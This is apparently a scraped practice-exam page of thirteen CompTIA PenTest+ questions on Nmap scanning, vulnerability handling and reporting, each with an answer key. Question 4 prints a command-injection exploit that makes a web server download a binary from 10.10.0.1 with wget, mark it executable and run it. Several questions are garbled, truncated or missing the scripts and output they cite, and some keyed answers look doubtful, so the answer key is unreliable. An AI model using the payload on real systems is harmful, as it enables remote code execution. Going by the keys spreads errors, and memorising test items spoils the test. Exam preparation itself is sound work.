CompTIA PenTest+ Certification - PT0-002 Exam Practice Test

Question 1

A penetration tester is performing a vulnerability scan on a large ATM network. One of the organization's requirements is that the scan does not affect legitimate clients' usage of the ATMs. Which of the following should the tester do to best meet the company's vulnerability scan requirements?

A. Run the scans only during lunch hours.

B. Use Nmap's -host-timeout switch to skip unresponsive targets.

C. Use Nmap's -T2 switch to run a slower scan and with less resources.

D. Run the scans using multiple machines.

Correct Answer: C

Question 2

A penetration tester created the following script to use in an engagement:
However, the tester is receiving the following error when trying to run the script:
Which of the following is the reason for the error?

A. The sys variable was not defined.

B. The argv module was not imported.

C. The argv variable was not defined.

D. The sys module was not imported.

Correct Answer: D

Explanation: Only visible for Actualtests4sure members. You can sign-up / login (it's free).

Question 3

During a vulnerability scan a penetration tester enters the following Nmap command against all of the non-Windows clients:
nmap -sX -T4 -p 21-25, 67, 80, 139, 8080 192.168.11.191
The penetration tester reviews the packet capture in Wireshark and notices that the target responds with an RST packet flag set for all of the targeted ports. Which of the following does this information most likely indicate?

A. All of the ports in the target range are closed.

B. Nmap needs more time to scan the ports in the target range.

C. The ports in the target range cannot be scanned because they are common UDP ports.

D. All of the ports in the target range are open

Correct Answer: A

Explanation: Only visible for Actualtests4sure members. You can sign-up / login (it's free).

Question 4

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a"
exploit += "HTTP/1.1"
Which of the following commands should the penetration tester run post-engagement?

A. grep -v apache ~/.bash_history > ~/.bash_history

B. rm -rf /tmp/apache

C. taskkill /IM "apache" /F

D. chmod 600 /tmp/apache

Correct Answer: B

Explanation: Only visible for Actualtests4sure members. You can sign-up / login (it's free).

Question 5

A security analyst is conducting an unknown environment test from 192.168 3.3. The analyst wants to limit observation of the penetration tester's activities and lower the probability of detection by intrusion protection and detection systems. Which of the following Nmap commands should the analyst use to achieve This objective?

A. Nmap -F 192.168.5.5

B. Map -scanflags SYNFIN 192.168.5.5

C. Map -datalength 2.192.168.5.5

D. Nmap -D 10.5.2.2.168.5.5

Correct Answer: B

Explanation: Only visible for Actualtests4sure members. You can sign-up / login (it's free).

Question 6

During a vulnerability management process that lasted several months, a security analyst found the number of vulnerabilities in a production web application consistently grew. Which of the following should the analyst do to best remediate this situation?

A. Implement a peer review process during the coding phase.

B. Implement security scanning during the pipeline for the CI/CD flow.

C. Perform penetration testing regularly.

D. Perform a security evaluation based on the OWASP Top 10.

Correct Answer: B

Question 7

During a penetration tester found a web component with no authentication requirements. The web component also allows file uploads and is hosted on one of the target public web the following actions should the penetration tester perform next?

A. Notify the primary contact immediately.

B. Shutting down the web server until the assessment is finished

C. Attempting to remediate the issue temporally.

D. Continue the assessment and mark the finding as critical.

Correct Answer: A

Explanation: Only visible for Actualtests4sure members. You can sign-up / login (it's free).

Question 8

A penetration tester discovered a vulnerability that has the following CVEs:

Which of the following CVEs should be remediated first?

A. CVE-2007-6750

B. CVE-2014-0160

C. CVE-2012-2122

D. CVE-2011-3192

E. CVE-2017-7494

Correct Answer: A

Question 9

A penetration tester who is performing an engagement notices a specific host is vulnerable to EternalBlue. Which of the following would BEST protect against this vulnerability?

A. Encrypted passwords

B. Patch management

C. Network segmentation

D. Key rotation

Correct Answer: B

Explanation: Only visible for Actualtests4sure members. You can sign-up / login (it's free).

Question 10

A penetration tester is evaluating a company's network perimeter. The tester has received limited information about defensive controls or countermeasures, and limited internal knowledge of the testing exists. Which of the following should be the FIRST step to plan the reconnaissance activities?

A. Use DNS lookups and dig to determine the external hosts.

B. Check WHOIS and netblock records for the company.

C. Launch an external scan of netblocks.

D. Conduct a ping sweep of the company's netblocks.

Correct Answer: A

Question 11

A penetration tester was brute forcing an internal web server and ran a command that produced the following output:

However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed.
Which of the following is the MOST likely reason for the lack of output?

A. The web server is using HTTPS instead of HTTP.

B. The tester did not run sudo before the command.

C. The HTTP port is not open on the firewall.

D. This URI returned a server error.

Correct Answer: C

Question 12

During a vulnerability scanning phase, a penetration tester wants to execute an Nmap scan using custom NSE scripts stored in the following folder:
/home/user/scripts

Which of the following commands should the penetration tester use to perform this scan?

A. nmap script default safe

B. nmap script /home/user/scripts

C. nmap resume "not intrusive"

D. nmap -load /home/user/scripts

Correct Answer: B

Explanation: Only visible for Actualtests4sure members. You can sign-up / login (it's free).

Question 13

Which of the following is the most secure method for sending the penetration test report to the client?

A. Encrypting the penetration test report with the client's public key and sending it via email.

B. Sending the penetration test report inside a password-protected ZIP file.

C. Sending the penetration test report via webmail using an HTTPS connection.

D. Sending the penetration test report on an online storage system.

Correct Answer: A

Explanation: Only visible for Actualtests4sure members. You can sign-up / login (it's free).

CompTIA PenTest+ Certification - PT0-002 Exam Practice Test

Latest Update

Useful Links

Contact Us